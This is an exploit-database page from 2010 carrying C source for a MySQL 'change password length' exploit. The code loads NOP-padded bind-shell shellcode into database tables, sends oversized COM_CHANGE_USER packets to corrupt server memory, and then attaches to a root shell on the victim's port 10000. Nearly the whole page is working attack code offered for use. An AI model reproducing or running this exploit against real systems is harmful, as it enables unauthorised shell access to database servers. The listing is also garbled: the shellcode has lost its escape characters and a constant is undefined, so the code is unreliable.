[local exploits] - MySql version 5.2 Change password length
Posted on 03 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>MySql version 5.2 Change password length shell | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='MySql version 5.2 Change password length shell by SeeMe in local exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>============================================== MySql version 5.2 Change password length shell ============================================== I know I know it's been a while, I've been that much into xss and forget about the rest.. Mad respect Inj3ct0r, please do not remove the comment that says Note: None is allowed to post this to exploit-db.com /* MySql version 5.2 Change password length shell * * Usage: ./mysqlexploit -h localhost -u boof -p boof -t user -d mydb -g port * * Tested on: MySql 5.2 other versions may be variable * * Greetings to: Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited ; Eidelweiss * * Note: None is allowed to post this to exploit-db.com * * Tested on: MySql 5.2 other versions may be variable */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <netdb.h> #include <sys/time.h> #include <resolv.h> #include <mysql/mysql.h> #include <signal.h> #include <getopt.h> /* shellcode 88 bytes*/ char *shellcode="x31x66x6Cxe3xb0x66x53x43x53x43x53x89xe1x4bxcdx80x89xc7x52x66x68x27x01x08x00x53x89xe1xb0x10x50x51x57x89xe1xb0x66xcdx80xb0x66xb3x04xcdx80x50x50x57x89xe1x43xb0x66xcdx80x89xd9x89xc3xb0x3fx49xcdx80x41xe2xf8x51x68x6ex2fx73x68x68x2fx2fx62x69x89xe3x51x53x89xe1xb0x0bxcdx80"; char db[50]="test"; // writable database char victim[100]="localhost"; int offset=0; /* Connect to port 10000 */ int do_connect(char *host) { struct hostent *he=gethostbyname(host); struct sockaddr_in sa; int outsocket,r; struct timeval tv; fd_set rfds; char buffer[500]; memset (&sa, 0, sizeof (struct sockaddr_in)); memcpy (&sa.sin_addr.s_addr, he->h_addr_list[0], he->h_length); sa.sin_family = AF_INET; sa.sin_port=htons(10000); outsocket=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if ((connect(outsocket,(struct sockaddr *)&sa,sizeof(struct sockaddr_in)))==-1) return 0; FD_ZERO (&rfds); send(outsocket,"uname -a; id; ",14,0); printf("[+] Successful, Run your shell!: "); while (1) { FD_SET (outsocket, &rfds); FD_SET (0, &rfds); tv.tv_sec = 30; tv.tv_usec = 0; select (outsocket + 1, &rfds, NULL, NULL, &tv); if (FD_ISSET(outsocket, &rfds)) { if ((r=recv(outsocket, buffer, sizeof(buffer), 0))==-1) exit(2); write(1,buffer,r); } if (FD_ISSET(0,&rfds)) { r=read(0,buffer,sizeof(buffer)); send(outsocket,buffer,r,0); } } return 1; } /* Print a silly joke! */ int nice_bar (int a,int max) { int i; int b=a*50/max; printf("0 ["); for (i=0;i<=b;i++) printf("."); for(;i<50;i++) printf(" "); printf("] 100% "); fflush(stdout); } /* Try a query in mysql server */ int do_query(MYSQL *s, char *query) { if (mysql_query(s,query)) { fprintf(stderr,"Query failed (%s) ",mysql_error(s)); exit(1); } } /* Boof the index cache */ int do_index(MYSQL *s) { char query[1000]; MYSQL_RES *res; printf("[+] Boofing index cache "); sprintf(query, "select * from %s.ow having u='junk';",db); do_query(s,query); if (!(res=mysql_store_result(s))) { printf("[-] Failed index cache boof "); } mysql_free_result(res); } /* Collect mysql database */ int populate (MYSQL *s) { char buf1[300]; char query[1000]; int i; memset(buf1,0,sizeof(buf1)); memset(query,0,sizeof(query)); memset(buf1,'x90',249-strlen(shellcode)-offset); strcat(buf1,shellcode); printf("[+] Creating temporal tables... "); sprintf(query,"use %s;",db); do_query(s,query); do_query(s,"create table oy(h varchar(250),a varchar(250));"); sprintf(query,"insert into oy(h,a) values ("%s","%s");", buf1,buf1); do_query(s,query); do_query(s,query); do_query(s,query); do_query(s,query); do_query(s,"create table ow(u varchar(250),d varchar(250),index(u,d));"); printf("[+] Collecting database.. this will take a time.. "); for(i=0;i<ROWS;i++) { do_query(s,"INSERT INTO ow(u,d) select h,a from oy;"); nice_bar(i,ROWS); } printf(" "); } void *sig_hand (int a) { if(do_connect(victim)) exit(1); } int main(int argc, char **argv) { MYSQL *sock,mysql; char abuf[10000]; char *hashpass,pass[50]="",user[50]="",ouser[50]="root"; int i,port=3306,opt,pop=1; unsigned long long int stime=1977321; printf("[+] MySql vuln lenght <5.x by �33[1;33SeeMe�33[0m "); memset (abuf,0,sizeof(abuf)); if (argc < 2) { fprintf(stderr,"usage : %s -h <host> -u <user> -p <pass>" " -t <other_user> [ -d writable_db] [ -g port ]" "[ -o offset ] [ -s microsecs_sleep ] [ -n ] ",argv[0]); exit(1); } while((opt=getopt(argc,argv,"h:u:p:t:d:o:s:g:n"))!=EOF) switch(opt) { case 'h': strncpy(victim,optarg,49); break; case 'u': strncpy(user,optarg,49); break; case 'p': strncpy(pass,optarg,49); break; case 't': strncpy(ouser,optarg,49); break; case 'd': strncpy(db,optarg,49); break; case 'g': port=atoi(optarg); break; case 's': stime=atol(optarg); break; case 'o': offset=atoi(optarg); if (offset>249-strlen(shellcode)) { printf("[-] Maximun offset: %d Aborting... ", 249-strlen(shellcode)); exit(-1); } break; case 'n': pop=0; break; } printf("[+] Do something with Params: "); printf("[+] Host: %s Port: %d User: %s Pass: %s ",victim,port,user,pass); printf("[+] Target_User: %s Writable_Database: %s ",ouser,db); printf("[+] Offset: %d Collect: %s Sleep: %llu ",offset, pop?"yes":"no",stime); signal(SIGALRM,sig_hand); printf("[+] Conecting... "); mysql_init(&mysql); if (!(sock = mysql_real_connect(&mysql,victim,user,pass, NULL,port,NULL,0))) { fprintf(stderr,"[-] Couldn't connect! %s ",mysql_error(&mysql)); exit(1); } printf("[+] Connected: Version %s ",mysql_get_server_info(sock)); printf("[+] Starting attack.. Rebuilding the base.. "); strcpy(abuf,ouser); hashpass=abuf+strlen(abuf)+1; strcpy(hashpass,"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"); if (pop) populate(sock); do { do_index(sock); net_clear(&sock->net); if (net_write_command(&sock->net,COM_CHANGE_USER, abuf,strlen(abuf)+strlen(hashpass)+2)) { printf("[-] Can't send command to server. "); } alarm(5); if (my_net_read(&sock->net)==packet_error) { alarm(0); printf("[+] Packet error..;) "); usleep(stime); mysql_init(&mysql); if (!(sock=mysql_real_connect(&mysql,victim,user,pass, NULL,port,NULL,0))) { printf("[-] Something is wrong!? "); exit(1); } } else { printf("[-] Attack failed! "); } alarm(0); } while(1); mysql_close(sock); } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-03]</pre></body></html>
